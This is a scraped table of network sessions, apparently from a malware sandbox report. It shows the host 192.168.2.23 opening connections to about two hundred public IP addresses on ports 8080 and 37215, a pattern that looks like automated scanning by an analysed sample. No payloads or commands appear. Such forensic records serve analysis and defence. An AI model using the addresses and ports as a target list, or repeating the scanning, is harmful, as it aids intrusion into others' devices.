                                                        15307192.168.2.2357282200.25.136.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15308192.168.2.2338970194.19.23.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15309192.168.2.235674443.243.154.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15310192.168.2.2356134154.114.117.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15311192.168.2.234246018.224.168.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15312192.168.2.2349576155.233.103.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15313192.168.2.2359000102.134.26.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15314192.168.2.2353786114.195.3.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15315192.168.2.235393294.35.98.18080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15316192.168.2.235817841.165.82.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15317192.168.2.2354612129.35.24.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15318192.168.2.2332964160.108.82.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15319192.168.2.234856084.39.49.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15320192.168.2.233950892.69.113.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15321192.168.2.2357888118.154.145.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15322192.168.2.233978425.74.187.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15323192.168.2.235249257.72.210.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15324192.168.2.234654841.40.42.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15325192.168.2.235353625.182.65.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15326192.168.2.233792624.100.193.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15327192.168.2.2350364197.248.54.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15328192.168.2.235696698.85.170.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15329192.168.2.2347174151.219.81.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15330192.168.2.2335098145.207.255.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15331192.168.2.236019427.49.12.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15332192.168.2.235191827.223.53.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15333192.168.2.2341690107.90.224.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15334192.168.2.2343208165.106.123.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15335192.168.2.233332024.37.216.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15336192.168.2.236034443.227.9.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15337192.168.2.2348336144.227.177.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15338192.168.2.2343358184.48.40.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15339192.168.2.2355630113.196.27.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15340192.168.2.2360990180.163.168.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15341192.168.2.2344002122.107.254.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15342192.168.2.235520646.35.194.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15343192.168.2.2353814202.93.126.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15344192.168.2.234552462.111.11.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15345192.168.2.2336018174.235.239.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15346192.168.2.2334718159.11.108.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15347192.168.2.2340704188.91.124.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15348192.168.2.2343698187.202.245.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15349192.168.2.2333818223.187.45.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15350192.168.2.2337142172.157.77.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15351192.168.2.2336362199.18.140.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15352192.168.2.234815462.78.46.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15353192.168.2.2335762143.122.19.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15354192.168.2.233774852.214.218.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15355192.168.2.2334918156.144.168.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15356192.168.2.234100037.202.86.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15357192.168.2.2333226187.221.239.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15358192.168.2.2347004185.103.100.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15359192.168.2.235254441.56.36.6337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15360192.168.2.234252841.247.168.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15361192.168.2.2344720197.178.147.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15362192.168.2.2344174157.155.88.13337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15363192.168.2.2336960197.106.116.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15364192.168.2.2350822197.34.213.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15365192.168.2.2339092197.4.27.22837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15366192.168.2.2335834157.94.204.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15367192.168.2.2336362157.125.228.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15368192.168.2.233398441.137.111.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15369192.168.2.2339978196.82.89.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15370192.168.2.2359456197.132.194.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15371192.168.2.2332826219.243.73.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15372192.168.2.2333088116.63.148.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15373192.168.2.2334878197.95.47.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15374192.168.2.2349256197.222.147.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15375192.168.2.2338554197.178.130.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15376192.168.2.2348398157.129.31.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15377192.168.2.2349118197.131.139.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15378192.168.2.235213841.103.169.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15379192.168.2.2344258157.226.78.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15380192.168.2.2347148197.121.161.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15381192.168.2.2357828193.161.161.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15382192.168.2.2336816197.205.221.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15383192.168.2.2355162141.160.16.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15384192.168.2.233379241.89.81.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15385192.168.2.235302641.185.125.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15386192.168.2.234296041.17.74.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15387192.168.2.235146835.91.10.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15388192.168.2.234705441.7.213.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15389192.168.2.23468802.78.173.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15390192.168.2.2359624197.127.181.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15391192.168.2.235457887.183.56.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15392192.168.2.2346380197.86.28.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15393192.168.2.235494641.128.68.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15394192.168.2.235743251.84.131.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15395192.168.2.2359282197.5.164.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15396192.168.2.2360566157.128.169.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15397192.168.2.2352950197.37.131.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15398192.168.2.233926441.215.66.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15399192.168.2.2343068178.39.188.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15400192.168.2.2351426142.165.239.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15401192.168.2.2356410193.18.188.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15402192.168.2.235067696.54.155.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15403192.168.2.2338556100.171.194.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15404192.168.2.2355310126.14.130.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15405192.168.2.2337174157.172.97.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15406192.168.2.234335041.61.137.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15407192.168.2.2340358157.126.78.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15408192.168.2.234895641.55.72.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15409192.168.2.2356782193.249.83.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15410192.168.2.235056057.111.117.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15411192.168.2.2350504157.201.56.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15412192.168.2.2343222157.246.97.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15413192.168.2.2359850157.120.91.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15414192.168.2.2336386157.84.71.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15415192.168.2.235205041.81.98.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15416192.168.2.2347036197.40.117.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15417192.168.2.2338512197.201.238.11937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15418192.168.2.234889219.132.59.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15419192.168.2.2359194157.116.53.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15420192.168.2.23365602.2.133.18037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15421192.168.2.2348268157.26.53.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15422192.168.2.2357862197.141.173.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15423192.168.2.2354760157.21.37.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15424192.168.2.234975841.189.90.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15425192.168.2.2357710157.108.66.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15426192.168.2.2350818194.141.92.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15427192.168.2.2340054197.181.147.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15428192.168.2.235148474.84.161.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15429192.168.2.2342688157.152.242.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15430192.168.2.2338124197.125.238.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15431192.168.2.234247441.226.226.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15432192.168.2.2335612197.41.242.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15433192.168.2.2356660197.158.208.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15434192.168.2.235462041.42.156.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15435192.168.2.234054241.227.100.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15436192.168.2.2336122197.138.20.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15437192.168.2.234648818.156.234.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15438192.168.2.2354640157.226.187.6937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15439192.168.2.234515241.136.15.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15440192.168.2.2351072197.162.12.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15441192.168.2.235764441.21.2.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15442192.168.2.2346742197.174.55.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15443192.168.2.2347506197.44.77.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15444192.168.2.233680041.44.97.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15445192.168.2.2349170197.33.201.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15446192.168.2.2346624157.227.108.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15447192.168.2.234779888.7.147.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15448192.168.2.2351976157.65.201.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15449192.168.2.234864241.189.165.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15450192.168.2.234903641.95.80.2337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15451192.168.2.234146641.206.33.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15452192.168.2.2341964170.84.190.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15453192.168.2.235927841.185.160.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15454192.168.2.2360600201.57.202.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15455192.168.2.235987641.144.178.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15456192.168.2.235979641.245.117.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15457192.168.2.2344486197.86.12.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15458192.168.2.2354424146.220.87.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15459192.168.2.2333040157.148.117.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15460192.168.2.2359444157.71.110.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15461192.168.2.234241641.78.175.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15462192.168.2.2350476183.195.192.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15463192.168.2.2358824191.88.115.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15464192.168.2.2356140120.201.178.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15465192.168.2.234279220.99.20.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15466192.168.2.2360006150.187.223.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15467192.168.2.2354582170.79.153.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15468192.168.2.2350692120.1.20.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15469192.168.2.234441238.94.163.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15470192.168.2.2354918223.33.79.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15471192.168.2.233597852.180.224.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15472192.168.2.2345212209.164.80.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15473192.168.2.2348688143.122.250.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15474192.168.2.233466218.214.204.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15475192.168.2.2355814219.99.241.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15476192.168.2.2360426199.193.158.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15477192.168.2.2355644199.166.126.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15478192.168.2.234155083.112.237.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15479192.168.2.233441889.4.136.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15480192.168.2.234064225.52.184.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15481192.168.2.2360476144.117.112.1188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15482192.168.2.235597441.193.205.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15483192.168.2.236057096.2.34.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15484192.168.2.2345928164.11.20.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15485192.168.2.233814099.86.184.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15486192.168.2.2335658201.232.46.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15487192.168.2.2355014182.54.143.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15488192.168.2.2340500146.201.120.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15489192.168.2.235572436.38.38.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15490192.168.2.2337002209.175.250.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15491192.168.2.2341670218.127.246.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15492192.168.2.2360056139.83.209.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15493192.168.2.235229288.107.24.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15494192.168.2.2349444218.167.165.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15495192.168.2.2353452164.119.144.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15496192.168.2.233736672.89.186.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15497192.168.2.2349812216.205.109.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15498192.168.2.2338194108.49.140.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15499192.168.2.2354848190.46.13.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15500192.168.2.233957095.217.219.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15501192.168.2.2340594108.214.244.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15502192.168.2.2356782118.146.46.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15503192.168.2.2334874102.27.200.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15504192.168.2.2346382139.46.250.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15505192.168.2.2342484122.81.72.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15506192.168.2.235979060.241.12.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15507192.168.2.2341000108.67.67.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15508192.168.2.233543432.166.170.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15509192.168.2.2344802138.11.32.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15510192.168.2.234318817.23.95.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15511192.168.2.234398067.226.108.1288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15512192.168.2.2340290203.164.229.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15513192.168.2.233294471.127.244.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15514192.168.2.235302450.34.52.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15515192.168.2.2360430168.227.249.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        15516192.168.2.2338880163.100.51.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
